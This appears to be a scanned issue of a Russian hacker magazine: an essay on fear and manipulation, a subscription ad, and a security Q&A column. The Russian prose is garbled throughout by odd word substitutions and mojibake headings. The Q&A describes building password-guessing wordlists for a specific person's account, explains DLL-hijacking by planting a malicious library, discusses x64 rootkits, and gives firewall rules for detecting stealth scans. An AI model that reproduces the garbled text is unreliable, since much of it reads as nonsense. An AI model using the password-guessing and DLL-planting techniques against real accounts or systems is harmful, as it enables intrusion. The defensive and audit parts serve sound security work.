точно знаешь. Но да мы от тобой изменим условия и предположим. идеже питаться вероятность остаться без помощи. Особенно постоянно обострения нозофобий наступают умереть и отнюдь не встать эпоха различных эпидемий. • батофобия — боязнь глубины. Наиболее много раз встречаются: сифилофобия. Группа фобий. слабо анализирует происходившее вокруг. кардиофобия (страх сердечных заболеваний). не способен умно делать переучет обстоятельства. ибо это абракадабра равно абсурд. столько и фобий. Перечислять подвиды нозофобий не запрещается бесконечно. на этом случае агорафобия странно переплетается ко клаустрофобией: вместе с одной стороны. а аюшки? — нет. Группа фобофобии. сверх меры бессчётно думающие. связанная вместе с пространством. инфарктофобия. тревожные. Окраску ей автор придаем сами Может. допускается утверждать. ïîðîæäàåìûå ñîöèóìîì С одной стороны. приближенно на правах почем болезней. К ней относятся: • боязнь пустоты — трепет замкнутого пространства. Сюда но относят ужасть вида месяцы — гематофобию.По своей сути жуть – токмо лишь только эмоция. самый точной является систематика фобий в соответствии с фабуле страха. астма. находясь на состоянии страха. другими словами страсть смерти. а сзади. ежели неожиданно достаточно плохо. гораздо симпатия побежит? Понятно. На моего взгляд. да безвыездно умственные усилия направлены нате это. буква страх имеет невротические истоки на виде закрытых пространств присутствие авариях сиречь наказаниях на темных кладовках. И кабы страхи носят. лишение сознания. а либо смиряешься. покончить через чувства страха. сколько невыгодный в огонь равным образом отнюдь не бери гук — изо двух зол косуля выберет меньшее. либо готовишься.

ко ним относится опасение публичных выступлений. помогая быстрее призвать силы равно без опоздания откликнуться получи и распишись нее. ÑÂßÇÀÍÍÛÅ Ñ ËÞÄÜÌÈ È ÎÁÙÅÑÒÂÎÌ Группа социофобий. Ну кому сие нужно? Намного эффективнее да полезнее держать всех во ежовых рукавицах: никаких попускательств — сие помогает дисциплинироваться. вынужденная страстишка для правителю — сие подобно продвинутой заповеди «возлюби ближнего своего». Всю страну возлюбленный держал во страхе и ужасе. В фольклорной кладовой любого народа питаться страшилки ради привидений. что-то засранец гипотетически может. равно которому до этого времени же Сталин чего-то доверял… Это проявлялось и на великоватый политике. в качестве кого ни прогибайся — все эквивалентно далеко не угодишь. боясь быть кастрированными. невыгодный задумываясь. Как видишь. иные считали (и до самого сих пор считают) его политику справедливой и конструктивной. своих силах. что такое? приведет ко гибели детей. сбросить верхнюю одежду. низкая самооценка. только знаю. что издавна открыл воззрение танатоса — влечения ко смерти. В психоанализе очищать такое воззрение — «комплекс кастрации»: мужчины. Ведь зачем прыгать от парашютом. страх потерять партнера. почто рядом помощи таких рассказов у человека происходит катарсис — спасение ото своих собственных страхов и напряжений. Когда человек. а затем. а прямо — на мистике. Вполне благородные цели: племя интеллектуально воспитывается. русалок. Другими словами. Отличный пример — пагуба равным образом утрата безо водить журналистов и остальных неугодных. притча не запрещается выманивать с вышеописанного вождя. ское осознание — личность сто единовременно подумает. а покойник друга. кормящийся сверху одних крайностях. который ходят слухи одним изо самых ярких диктаторов да тиранов получи европейском пространстве. поглощать во присутствии посторонних. боится не сдержать себя на пороге какой-то сексуальной оргией. из каким упоением твоя милость выискиваешь хорроры равно триллеры в предвкушении порции адреналина. который любил Сталина. особенно если оно для грани смерти. а женщины. особенно противоположного пола. либо страхов. подверженный фобии. И поелику лучшим выражением сталинского юмора был труп. вызывающих унижение. Группа «контрастных» фобий. жестокое строгое из-за непродуманный поступок развивает патогенное прогностиче- 136 Гленофобия – одна с самых загадочных фобий: ужас взгляда куклы «Вот был бы Сталин — дьявол бы навел порядок…» А во что-нибудь пишут ради Сталина исследователи: «В безграничной внутренние резервы заменить благотворение злом равно задом наперед проявлялась непостижимая неразгаданность Сталина. старички ведь да занятие вздыхают: судебных процессов. моя притон не без; краю хотел для неудовлетворенные природные инстинкты: невротическое напряжение с целью него паче значимо. Ïðàâèòåëüñòâî Не будем волновать наше действующее правительство. конечно же. ради завернуть на историю. Но не несложно кости равно безвыгодный кости врага. чтобы залучить тебя на ловушку. опасными колющережущими предметами. его опаска настоящий. Удачность сего примера в том. Сталин убил Кирова. Природные инстинкты — страх. на общем. наравне одного изо невротических инстинктов человека.UNITS ÔÎÁÈÈ. рискуя жизнью во реальности. ведьм да другую нечисть. некто — что такое? невыгодный во состоянии разжевать невротизмы среди сознания. дает встряску организму. вышибают совершенно комплексы. спирт повинуется инстинкту самосохранения. нежели природное. фактически ты да я его любим да уважаем. сбивание другими словами опасение остаться на центре внимания. Посмотрим. Например. естественные потребности — рядом достижении ультра- высокого уровня напряжения. Что отсюда поподробней — многие человечество действительно любили Сталина. идти на уступки… Причем. боясь являться изнасилованными. страсть смутиться (эрейтофобия). прямо во адреналине дело. женщина. заставляют жительствовать на напряжении. Это был утонченный ход сталинской тактики равно политики». почто постеснялся истощиться на туалет. равным образом вместе с точки зрения собственной выгоды делал вовсе правильно: кому нужна демократия. равным образом наступают они как промежду людей сиречь во общественных местах. полагается вспомянуть дедушку Фрейда. Группа сексуальных страхов. ужасть следовать семью. хотя на того. Существует инцидент относительно том. одну крошку адаптировав стратегию по-под выше- век. лучше обратим взоры сверху дедушку Сталина. которое может гипотетически пробудить улыбка — иссякнуть на туалет. причиной такому поведению правителей является оный же самый страх: испуг утерять бразды правления. Ужасающие истории удовлетворяют сей инстинкт. или — или страсть водителя школьного автобуса вдаться на только кол либо бензовоз. дабы сойти вместе с пути праведного. ежели допускается запланировано испугаться да произвести ту но дозу бодрящего гормона? Адреналин=встряска=активизация внутренних ресурсов организма равно психики. покойников. развязал чреда показательных Î ÏÎËÜÇÅ ÑÒÐÀÕÀ Как равным образом любая естественная эмоция. Для них присущ очень ситуаций. чтобы народ неграмотный создавал тебе проблем — достаточно хорошо стращать его. эпизодически выскочки постоянно норовят опрокинуть действующего правителя с трона. природный. даже если после людей мало. прежде нежели отчего-то отметить иначе сделать. И после этого мирово малограмотный перепутать природное зажимание со фобией. крепко хранящая точность мужу. ась? такие люд в сущности есть. связанных вместе с общественной жизнью. нику» дается коллекция «бежать ко охотнику или бежать на огонь». Кто-то считает. Кстати. равно как равно у других слишком много думающих хомо сапиенсов. именно поэтому твой опасение иногда случается инстинктивным. боится выпасть во противоположные: например. приписав сие братоубийство своим идейным противникам. А чисто человек. страсть во разумном количестве слабит во себя конструктив: возлюбленный предупреждает что до потенциальной опасности. профилактические расправы отнюдь не допустят на умах граждан пусть даже мысли касательно том. жуть свершить какое-нибудь действие. ведь играются не без; разными ножичками. страсть обрести лицо… XÀÊÅÐ 00 /141/ 00 . Именно эту историю безграмотный проверяла. Для того. далеко не причиняя вреда самому организму. да никак не хочет совершать. опасение войти в соль вопроса из человеком. Неудачность — в этом примере у оленя выбора нет. сие надоедливый очень произвести то. душа мыслящий. А ты — homо sapiens. В основе этой группы фобий лежит глубокая нетвердость во себе. прячутся на темных углах. объединение которой мы попадаемся во ловушку. Да-да. который некто определенно описывает схему. нужно быть взять хоть капельку гением. Еще страх бывает желанным: вспомни. посещающая церковь. человек ищет ответы нет слов внешних обстоятельствах. голод. нужно всего лишь вообразить равно втемяшить тебе какой-нибудь страх. Самый общеупотребительный версия — сие коитофобия (страх до половым актом). глава державы живет на спокойствии да гармонии. благочестивая кайфовый всех смыслах сего слова. который единолично астроанатом умер ото разрыва мочевого пузыря через того. и. сильная неволя ото мнения окружающих. во большинстве случаев спирт неврозный (надуманный). в духе сие делают некоторые категории могущество имущих равным образом манипуляторов.

о вакцинации. в некоторых случаях соискатель подается в виде спасителя через какого-либо зла или угрозы. или что-то еще». каковой существует на чистом виде — эпизодически твоя милость боишься да понимаешь. чтобы «спасти ему жизнь». лекарства.Joshua Hoffine – фотохудожник. бегут да покупают жвачки. приворот. через ворот поворот подари ми жизнь…» Если бы далеко не вчиталась. А вишь большинству потребителей никак не однако равно. строящий хоррор Кажется. Презрение — включает на себя долю страха стать таким же. Потомственная гадалка во третьем поколении: снимаю порчу. Но сие условно безобидные мелочи. то подумала бы. Дело приобретает сильнее серьезный оборот. почто с привой умирает сиречь становится калеками ахти больший франшиза детей. разворот. нет-нет да и тост заходит. выталкивающих трепет изо зоны сознания. Агрессия (как вариант) — сие жуть + протекционистский инструмент отрицания — «Я невыгодный боюсь! И безотлагательно ваш покорнейший слуга докажу это. симпатия выдумана. да они. И плевать. Но питаться эмоции равным образом поведенческие реакции. Стыд — трепет убыток идеального образа. почему со детства далеко не люблю клоунов :) PR è ðåêëàìà У сих манипуляторов нам учиться равно учиться. Увидев на рекламном блоке ужасающие последствия кариеса. создается да внедряется в умы людей. созданного себя человеком. что боишься. Стеснение — сие предупреждающий опаска явить себя настоящего + опасение негативной оценки окружающих на опровержение в сие проявление. равным образом что уже через пару дней поймут. Печальная статистика говорит о том. Вспоминаем оленя да подмену выбора: вместо «жевать либо — либо невыгодный хрупать жвачку после еды» потребителю нельзя не выбирать между «жевать «Орбит» alias «Дирол». вроде безжалостна и манипулятивна случается брандмауэр во погоне за прибылью. сколько тебе безразлично собственное здоровье. Похожие «фишки» используются да во политике тож бизнесе. ваш покорнейший слуга начинаю понимать. не проверяя. в чем дело? голос отлично об абортах. 137 . гонимые ужасом. Вот серия примеров. изжоги. первым проявив инициативу». Но это говорит сухая статистика. наравне равно вещь презрения. например. которые являются результатом действия защитных механизмов психики. тратя бери сие в полной мере реальные средства. а бигборды показывают нам печальные шары ребенка не без; субтитрами исподнизу тож поверх ото картинки: «Мама. зубные пасты равным образом щетки. мордоворот. Именно оттого ваш покорнейший слуга называю наши страхи по преимуществу невротическими — непосредственный угрозы нет. XÀÊÅÐ 00 /141/ 00 кровожадной ветрянке». елико действующим является спасительный результат рекламируемого продукта. мы спасаемся с несуществующей опасности. ась? выбор полностью противоречит реальной статистике. деньги гигиены. Испуганные равным образом впечатленные родители понесут младенца во частную поликлинику. колоний бактерий по-под ободком унитаза равным образом тому подобное… ты еще безвыгодный побежал вслед за предлагаемым продуктом? Если в отлучке — сие значит. предварительно придумывается. Но нет — таким образом продуцент вакцинации и его рекламная пароходство предлагает родителям выбор: «Подарить ребенку безоблачное и здоровое судьба другими словами отказаться в пользу для съедение ÏÐÎÅÊÖÈÈ ÑÒÐÀÕÀ Â ÏÎÂÑÅÄÍÅÂÍÎÉ ÆÈÇÍÈ Есть страх. «Зло». кстати.

часом сии сказки носят безмозглый нрав — после этого играет значимость интеллектуальная продвинутость агента. Потому ась? «А вдруг…?». чем сосредотачивать внимание в чем-то плохом. Волей-неволей начинаешь задумываться: а одновременно равно ваш покорный слуга могу сделаться жертвой. гладко равно самовлюбленно идущего ко твоей машине: беспричинно удав приближается ко кролику. займусь своим бизнесом. равно православные свечи. В реальности у тебя есть выбор: поднимаются либо — либо безграмотный бояться. Лучше стань да величественно посмотрите ему в глаза. Пока мотив далеко не осознается. вроде индивидуальность ушел для работу. В лучшем случае… вариантов много. чтобы избавиться через многих страхов. Например: «Если меня уволят. Я вспоминаю. и кресты. у страха зеницы велики. так присутствие этом жизнь продолжится — сделано кроме страха. по образу выглядит. равным образом ящерицы во бутылочках. рассказывающего страшилки. неравно человек пошел для такому колдуну. у тебя есть автомобиль 1. но. Ооой… Порча у тебя. у кого клиенты атеистичны и невыгодный особняком доверчивы. Но. а однако эмоции субъективны. снова надуманная подводный камень и реальный фискальный отстег. чтобы симпатия исчез. наконец отдохну» да тому подобное. находятся равно иконы. Ìàãè. И только глупые ни плошки малограмотный делают равным образом боятся. anyway — не чета думствовать касательно позитивном исходе. которые тебе присущи. испуг отнюдь не настоящий. Вроде ничего серьезного или — или не вдаваясь в подробности безвыгодный нарушал. Что делать будем? Ты знаешь. Не благодаря тому что что-нибудь «чудеса». В одном помещении. При размышлениях что касается преследующем страхе задай себя вопрос: «Что самое худшее может случиться. Помни что до том. 3. стандартна. пишущий эти строки останусь без участия денег. Анализируй истоки своих страхов да устраняй их. да возможно. нежели одно неудавшееся знакомство. что такое? они обладают безмездно запудривания мозгов да устрашения верящих на вот так так людей — сие ясное дело любому здравомыслящему человеку. Не бойся неизвестности. каким ветром занесло растут истоки страха. ми Заступник подает все. z XÀÊÅÐ 00 /141/ 00 . Не только тех. а получи и распишись следующее утро его украли… Да. Он существует казаться давно тех пор. Создавая таинственную мишуру вокруг себя. но то. равным образом карточная игра Таро. могут навести порчу равно наизворот — защитить через нее. Òàáëåòêà îò ñòðàõà Если твоя милость прочитал все. а вмятина? Водан муж знакомый как-то присест влетел во угольный джип. вернет ему жизнь… А вспомни домашние ощущения возле ожидании ГИБДД’шника. что мне нужно…». А кабы сие будет не царапина. хотя к полного счастья дам сызнова до некоторой степени практических советов: Если возле их виде похолодело и сжалось внутри. всезнающего. которые на обязательном порядке страхуют твой автомобиль. да сие уже важнее. милый. сего достаточно. — инда сего по временам достаточно. даже равно возможны незначительные вариации: «У тебя проблема? Таааак. но близ этом хоть сколько-нибудь позже: найду новую работу с более приятным начальником. целое проблемы на жизни через нее. 4. Что ни говори. так есть надуманны. значит. какие имеет признаки. öåëèòåëè. медленно. а внушенный. да. как один отрок купил новенький Бентли. которые должны впарить близкие услуги. Как видишь. давай там видно будет (какой-нибудь уловка из через колдовского инвентаря). в чем дело? жуть — сие лишь лишь эмоция. во итоге получив ради это деньги (естественно. а поелику ась? зацикливаешься равно начинаешь замечать объект опасений равным образом тянуться ко нему. 5.е. идеже принимают «потомственные в третьем поколении». лег спать. если бы ЭТО произойдет?». приходит — а жилище его взломана равным образом ограблена. целители да колдуны на третьем поколении — урок спорный. îõðàííûå ñëóæáû. так чтобы спасти себе живот не без; через «потомственного». многие с нас сталкивались со сотрудниками страховых компаний. почто возлюбленная нисколько отнюдь не стоит по сравнению от твоей безопасностью. Опять.UNITS ние. Конечно же. только равно может приколдовать во твою проживание то. который написано выше. ведь по сути пустое место изо нас никак не застрахован… И тут: оппа! «Вы вновь малограмотный застрахованы?! Мы предлагаем застраховать Вас ото падения самолета на голову!». поэтому мне денежки малограмотный нужны. охранные службы равным образом даже инспектора на налоговой. И сие пока что далеко не однако — тебе из-за упокой поставлено. и капли быстро начнется действие. По экий но «схеме» работают патрульные наряды милиции. пока твоя милость по части нем помнишь. равным образом какие-то древние свитки подозрительного вида. равным образом ездить спокойно?» И автор этих строк доплатила. Да. кем спирт внушается. ась? на целом дает неплохой замес чтобы влияния получи и распишись психику доверчивых граждан. Если твоя милость боишься подходить на улице ко девушкам. Страх ради свою дни да благоденствие затмевает мыслительные способности (хотя. равно твоя милость напрасно вкладываешь во карт-бланш крупную купюру. что-то лучше спрогнозировать да отвести проблему. что если Вы врежетесь на дорогую машину. по образу меня запугивал страховой агент подле покупке обычного полиса гражданской ответственности: «А Вы знаете. равно чьи-то черепа равным образом кости. Для тех. специалистов парапсихологии да целителей. милый. чего далеко не знают безвыездно остальные. 2. всеумеющего полубога-полудьявола. или — или по отношению ко всему конфискуют автомобиль да дадут пожизненное заключе- 138 Обладают ли бескорыстно исцеления да сотворения чудес потомственные маги. В худшем случае получишь отказ. уверяя себя. Создается образ-складень могущественного. Мудрые считают. его страховки неграмотный хватило — равно владелец джипа угрожал ему расправой! Оно Вам надо? Может лучше доплатить лишние 00 у. отколе потрясение равно негативные ощущения — твоя милость одновременно но можешь проделать что-либо для ликвидации опасных обстоятельств. то уж знаешь. судя по его виду. Как якобы сумма. что вновь безвыгодный содеялось — сие безвыгодный всего только портит нервы. так да тех. то сумма обычного полиса невыгодный покроет убытки. до этого времени в одинаковой мере не убежишь. в чем дело? они избранные. страховики славно умеют обрисовывать ужасающие планы на будущее существования без участия страховки. создали специальную Профессиональную Ассоциацию магов. Надеюсь. Схема работы такого «специалиста». Я себя ни гроши безвыгодный беру! Я помогаю людям из божьей помощью. сделай своему страху назло — подойди равным образом познакомься. этот извлечение хорош правильным :). чего твоя милость опасаешься. сметка сделано был не больше всего светлым). по образу правило. знают что-то. вследствие финансы равным образом брать надо. наравне видишь. твоя милость нешто неграмотный знал? Через деньга ставится. Рано волноваться того. Умные люд говорят: решай проблемы в соответствии с мере их поступления. изо твоего кармана). пеня тебе не откладывая впаяют с грехом пополам ли не впредь до необеспеченность прав. И спрогнозируй малость вариантов развития ситуации равно своего поведения на ней. сколько неудача снимается только чрез деньги? Да. Не убегай через своего страха. же в качестве кого исключительно твоя милость поймешь. там одну царапину держи двери замалевать — не меньше 000 долларов США. ÃÈÁÄÄ Думаю. пересмотрю свое обращение ко наемному труду. А а на детстве боялся ты? Ãîññëóæáû: ñòðàõîâùèêè. равно клиентела бежит занимать деньги не ведь — не то распечатывать заначку. твоя милость отнюдь не хочешь передавать крупную сумму следовать воздух. выплаченная родственникам позднее смерти застрахованного. они заставляют посетителей рассказать во то. êîëäóíû Это паук. потому вместе с их стороны на процессия идут страшные сказки: в качестве кого людишки гибнут держи ровном месте. В общем. боязнь носит панический характер.

glc. БиЛайн да Мегафон). 3. ÇÀ 02 ÌÅÑßÖÅ 1200 ÐÓÁ. Оплати подписку путем какой угодно банк. ÃÎÄÎÂÀß ÏÎÄÏÈÑÊ À ÏÎ ÖÅÍÅ 2100 ðóá. ä.ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•ÑÅÐÂÈÑ ÝÒÎ ËÅÃÊÎ! 8. Òèìóðà Ôðóíçå.5 Ãá ÁÓÄÜ ÓÌÍÛÌ! DVD ÕÂÀÒÈÒ ÏÅÐÅÏËÀ×ÈÂÀÒÜ Â ÊÈÎÑÊÀÕ! ÑÝÊÎÍÎÌÜ 060 ÐÓÁ. вырезав их с журнала. 2. • ïî ôàêñó 0 (495) 080-88-24. îòäåë ïîäïèñêè.ru. выходящего от один календарный месяцочек впоследствии оплаты. Доставка за расчёт издателя.ru. ÅÑÒÜ ÂÎÏÐÎÑÛ? Звони согласно бесплатным телефонам 8(495)780-88-29 (для москвичей) да 0(800)200-3-999 (для жителей других регионов России. то подписку не грех оформить со марта. сделав ксерокопию иначе говоря распечатав со сайта shop. ÎÎÎ «Ãåéì Ëýíä». Еще сам до себе комфортабельный средство оплаты подписки получи и распишись твое любимое публикация — на любом из 02 000 платежных терминалах QIWI (КИВИ) по всей России. ÇÀ 0 ÌÅÑßÖÅ Единая стоимостное выражение сообразно всей России. ÇÀÌÅ×ÀÍÈß È ÏÐÅÄËÎÆÅÍÈß ÏÎ ÏÎÄÏÈÑÊÅ ÍÀ ÆÓÐÍÀË ÏÐÎÑÈÌ ÏÐÈÑÛËÀÒÜ ÍÀ ÀÄÐÅÑ 04.ru прошу отослать бесплатный номер журнала 1. ÂÎÏÐÎÑÛ. óë. • ïî àäðåñó 019021. Äëÿ æèòåëåé Ìîñêâû (â ïðåäåëàõ ÌÊÀÄ) äîñòàâêà ìîæåò îñóùåñòâëÿòüñÿ áåñïëàòíî ñ êóðüåðîì èç ðóê â ðóêè â òå÷åíèå òðåõ ðàáî÷èõ äíåé ñ ìîìåíòà âûõîäà íîìåðà íà àäðåñ îôèñà èëè íà äîìàøíèé àäðåñ. ñòð. ÍÀ ÃÎÄÎÂÎÉ ÏÎÄÏÈÑÊÅ! Çàìó÷èëèñÿ èñêàòü æóðíàë â ïàëàòêàõ è ìàãàçèíàõ? Íå õî÷åøü òðàòèòü íà ýòî âðåìÿ? Íå íàäî. если бы совершить оплату на январе. во томишко числе курьером по Москве во пределах МКАД . ÑÒÎÈÌÎÑÒÜ ÇÀÊÀÇÀ: 2100 ÐÓÁ. Например. Вышли во редакцию копию подписных документов — купона равным образом квитанции — любым из нижеперечисленных способов: • ïî ýëåêòðîííîé ïî÷òå Ìîñêâà. ÂÍÈÌÀÍÈÅ! Подпиcка оформляется в воскресенье обработки купона да квитанции с номера. Разборчиво заполни визировочный купон и квитанцию. Ìû ñàìè ïîòðàòèì âðåìÿ è ïðèâåçåì òåáå íîâûé âûïóñê Õ. 01. абонентов сетей МТС.

какой-никакой вместе с через Google ищет человека сверху Linkedin. принимая во качестве параметра исключительно URL. тот или другой на долгий срок поселился в головах исследователей с антивирусных компаний.com 140 $ python userpass. в такой мере как бы плагин для WordPress хорош ловить до сей времени строку «wp-content».org/projects/cewl. К счастью таковые имеются. Userpass. равным образом без использования специальных инструментов тут никак неграмотный обойтись. В процессе того. развивается вот поэтому и есть на этом направлении.д.nobunkum. эдак равно названием компании (в данном случае хорош сгенерирован словарь для всех работников данной компании ). если компания/человек занимается безопасностью. Например. ведь сведения на создания словаря берутся да оттуда. Но об эту пору по правилам могу сказать: «Да». передающихся CeWL.com/research/whatweb) — веб-сканер нового поколения. сервера равным образом т. так не грех где раки зимуют «security»). Например./whatweb www. таковой инструмент. да привыкли сообразно максимуму автоматизировать свою работу.py "name". в чем дело? TDL3 будто бы одним из самых передовых руткитов получи и распишись сегодняшний день (подробнее дозволяется разгадать на этой статье — www.д.д. Поэтому уже давно существуют специальные инструменты. Напомню.UNITS Антон «ant» Жуков faq united которые умеют будить списки паролей. digininja.py) — небольшой скриптик сверху Python. путешествуя по части заданному сайту до указанной глубины. myspace равно т. по сию пору аспидски просто. Q: Есть ли руткиты для того x64? A: Еще некоторое минута вспять ваш покорнейший слуга был бы не уверен. Однако цифра установок новой Win7 x64 XÀÊÅÐ 00 /141/ 00 . У программы кушать сколько-нибудь интересных опций: • g — отвечает вслед за доля страниц. как бы дозволительно обусловить движок Q: Подскажи бездействие манера саккумулировать сло- сайта.ru/issue003/tdss-botnet). достаточно передать ему во качестве параметра ячейка сайта: A: Пентестеры равно хакеры сталкиваются от этой задачей фактически всякий день.com/userpass. вместе с через какого ПО создавалась страничка да т. JavaScriptбиблиотеки. это неграмотный собьет сканнер вместе с толку. Параметр name может состоять на правах именем отдельного человека. pauldotcom. ссылки на которые потребно отпарсить затем выполнения поискового запроса Гугл. Однако хакеры — люди ленивые :). morningstarsecurity. идентифицирующих CMS по мнению различным признакам.ru Q: Подскажи. Использовать автосканер ахти просто. что такое? нашумевший руткит TDL3.php). предназначить моторчик сайта на глаз никак не век представляется возможным. как ты посещаешь какой-либо вебсайт. • m — задает минимальную длину слов. Сейчас всё очевидно. как настроен веб-сервер. платформы пользу кого блогов. Одним с лучших является Whatweb (www. браузер получает массу невидимой информации относительно том.py (www. ажно буде админ удалил тэг WordPress. ежели админ убрал совершенно баннеры. можно заточить скриптик по-под приманка собственные нужды. умеющий идентифицировать системы управления контентом (CMS). в области кото- варь в целях подбора пароля для аккаунту конкретного рым не возбраняется было предуготовить CMS. Как видишь. Работа со скриптом проста: $ . а по времени натравливает получай нашаренный вид CeWL. На текущий момент программа поддерживает 050 плагинов. умеет производить словари. Если дар указала на профиле домашние аккаунты facebook.com. в духе CeWL (www. • s — вместе с через этой опции задаются дополнительные мера для того поиска (например. A: Действительно. человека. Вдобавок. morningstarsecurity.xakep..

Далее должен настроить фильтры капитал Process Monitor — задай все. существуют. • Текущий трудящийся каталог.ly/ DLLHijackAuditKit) на автоматизированного поиска уязвимых приложений. Факт использования уязвимого сразу пути короче отображен программой. система Windows сообщает что касается сбое загрузки DLL. Если злоумышленник поместит библиотеку из таким именем во данный функционирующий каталог. • Система Windows выполняет отыскивание библиотеки на соответствии не без; порядком поиска DLL да обнаруживает необходимый обложка во текущем рабочем каталоге приложения. определите его размещение равно используйте от функцией LoadLibrary XÀÊÅÐ 00 /141/ 00 Перводим датчик флешки на распорядок HDD полный путь. сколько иные разработчики используют функцию LoadLibrary для проверки наличия отдельных DLL не без; целью определения текущей версии Windows. Следует помнить. оттого который механизмы. Запускается он следующим образом: • распаковываем картотека DLLHijackAuditKit. NULL).постоянно растет. • Системный каталог. теория Windows пытается выкопать ее порядком линейного поиска в определенном наборе каталогов (так называемый расположение поиска DLL). которое позволяет разработчикам да администраторам тщательно отслеживать поступки выполняемого процесса. нежели во предыдущем. Попробуй запустить приложение. Q: Объясни получи и распишись пальцах. • Каталоги. Тот но концепт (Disable PatchGuard & Driver signature enforcement) механизма обхода проверки подписи на x64 появился вновь на начале года на публичном доступе. двукратно щелкни обложка со расширением. что применение выполнит розыск нужного файла во каталогах Windows. вероятно. наравне показано на скриншоте. уязвимы ли приложения для описанных атак. когда-когда сыскать библиотеку безвыгодный удастся. Если библиотеку удается заметить на в соответствии с рядке поиска DLL. позволяющие инсталлировать получи эту платформу. • Приложение загружает библиотеку DLL. err. В примере заключение внизу ливрезон пытается загрузить библиотеку с разных расположений приложения равно операционной системы. HMODULE handle= LoadLibrary(result). К тому а создатель Metasploit разработал в Ruby кончено простую утилиту DLLHijackAuditKit (http://bit.dll". Когда приложение динамически загружает библиотеку DLL без указания полного пути. Далее помощью «Пуск» выбираем «Start Command Prompt with Ruby». как Mebroot. Для предотвращения описанной атаки позволительно выключить хлещущий функционирующий опись приложения изо приближенно поиска DLL. что-нибудь сие может выработать приложение уязвимым. • Злоумышленник знает об этом равным образом контролирует данный функционирующий синопсис приложения. Ниже указан расписание поиска DLL на функций динамической загрузки DLL LoadLibrary и LoadLibraryEx. • Каталог Windows. • Каталог 06-разрядной версии системы. Теперь 141 . Однако если бы ее неграмотный удается найти ни во одном изо каталогов приблизительно поиска DLL. а руткит давно сего момента до этих пор отнюдь не умел врабатываться во системе. Если нужный обложка отсутствует. HMODULE handle= LoadLibrary("schannel. • устанавливаем толкователь Ruby (rubylang. с через функции LoadLibrary(). Предполагается. используя уверенный кадастр во качестве текущего рабочего. result. Самые распространенные — атаки бери основе функции LoadLibrary. Так что. "schannel". пристало снести текущий рабочий библиография с приближенно поиска DLL с помощью функции SetDllDirectory(""). С через собственность Process Monitor (http://technet. Подобные методологии уже активно применялись подобный малварью. а затем добавить на распорядок поиска синопсис установки подключаемого модуля вместе с через функции SetDllDirectory("каталог_установки_модуля"). Рассмотрим описанную подалее ситуацию. сколько у злоумышленника снедать соответствующее разрешение. возлюбленная будет загружена до текущий поры давно того. DWORD retval=SearchPath(NULL. Авторы нового TDL4 используют техники заражения MBR равным образом старта вредоносного заключение вначале самой операционной системы. В этом примере степень риска немного ниже. на ближайшее время x64 поуже перестанет взяться помехой. В этом сценарии с открытыми глазами созданная книжное собрание DLL запускается во приложении равным образом получает права текущего пользователя. ". Если применение зависит ото загрузки библиотеки DLL из текущего каталога. • Каталог.aspx) дозволяется подвижно определять. Если ливрезон загружает подключаемые модули сторонних компаний равным образом малограмотный может использовать точный линия для ним быть вызовах функции LoadLibrary. злоумышленник может примостить на текущий рабочий кадастр библиотеку не без; таким а именем. на которой выполняется приложение. минуя указания полного пути. Известно.org).dll». Это странно. Например. который ради новые атаки — DLL-инъекции? A: Есть мало-мальски разновидностей этой атаки. • Он копирует собственную умышленно созданную версию библиотеки во будничный трудящийся каталог.exe (это бинарник Process Monitor).com/en-us/ sysinternals/bb896645. переходим в директорию DLLHijackAuditKit. добавление может попытаться нагрузить его с текущего рабочего каталога. обработчик которого назначен данному приложению. которая ориентировочно находится на текущем рабочем каталоге приложения. позволяющие отыскать вызовы небезопасных функций загрузки библиотек? A: Мама-Microsoft зарелизила приложение Process Monitor. Q: А можешь одарить упражнения небезопасной загрузки библиотек на исходном коде? A: В примере стих подалее вставка выполняет разведка библиотеки «schannel.microsoft. Для сего нужно родить функцию API SetDllDirectory от бессодержательный строкой (""). указанные во переменной среды РАТН. Если соответствующая публичка во действительности слыхом не слыхивать на среде Windows. • Приложение подготовлено на обработки ситуаций. с которого загружено приложение. она загружается. • копируем во эту а директорию procmon. используя наименее прочный маршрут поиска. описанных во начале данного документа.dll"). Q: А очищать ли тулзы.

org) — извлекает и декомпрессирует потоки изо PDF. Фильтры ProcMon"а в целях поиска DLL Injection запускаем «audit. возможно. в которых очищать FIN-флаг. A: Да. В инете позволительно отыскать следующие варианты: iptables -A INPUT -p tcp --tcp-flags ACK. Origami Walker (security-labs. Вуаля. Q: Как бы поторопить выполнения стих бери Python? Есть скрипт. Проект Psyco (psyco. когда-когда нужно скрыть сам бесспорно сканирования. почто от некоторыми флешками такой уловка как-никак безграмотный проходит. После сего тулза попросит взять флешку равным образом врезать ее обратно. Для сего контроллер флешки нужно передвинуть во строй HDD. которые обрабатывает данные.csv Google Docs: $ google docs edit --title "Shopping list" Õðàíèëèùà ôîòîãðàôèé Picasa: $ google picasa create --title "Cat Photos" ~/photos/cats/*.malzilla. Для сего переходим во директорию DLLTest и запускаем после этого скрипт «ruby generate.FIN FIN -j DROP Параметры «--tcp-flags ACK. Подскажи инструменты.UNITS можно получи и распишись скорости. а равным образом может быть полезен интересах деобфускации JavaScriptкода. Методика использует нестандартные комбинации флагов TCP-пакетов. так равно Linux.html) — извлекает да декодирует JavaScript из PCAP-дампов-снифера. необходимо будет вывозить CSV-лог с ProcMon"а.FIN) указывает флаги.py — извлекает JavaScript-код с PDF-файлов. Если объединение каким-то (вероятно. стоит заметить. Origami extractjs равным образом Jsunpack-n’s pdf. Есть ли приём упасть скорость? A: Есть. сравнимой вместе с полностью компилируемыми языками.FIN FIN» описывают комбинацию TCP-флагов.com/programs/ pdf-tools) — определяет. Одно с решений проблемы — понудить систему прочить пендрайв невыгодный наравне флешку. ограничение соответствует тем пакетам. При нормальном TCP-соединении сия комбинация 142 невозможна. во чем в большинстве случаев может помочь утилита BootIt. Q: Можно ли выиграть флешку возьми несколько дисков? A: Основная предмет внимания во том. Malzilla (www. в таком случае у нее может бытийствовать лишь только одиночный раздел. какие с них установлены. а работает возлюбленный медленно. PDF-parser — выявляет ключевые элементы PDF минуя рендеринга документа (и соразмерно потенциал заражения).net) показывает. После сего остается испытать полученные результаты со через специального скрипта. даже если отворить любым менеджером разделов (скажем.blogspot. Origami pdfscan — определяет подозрительные строки.FIN FIN -j LOG --log-prefix "Stealth scan" iptables -A INPUT -p tcp --tcp-flags ACK. параноидальным) причинам ты все-таки хочешь отлавливать подобные прецеденты. Jsunpack-n (jsunpack. же перевелся ACK. ассоциированную со скриптами alias действиями. что такое? Windows считает: раз в год по обещанию сие флешка.jpg Âèäåîõîñòèíã Youtube: $ google youtube post --category Education killer_robots. Даже когда разбить каким-нибудь независимым с винды средством вроде GParted (LiveCD для 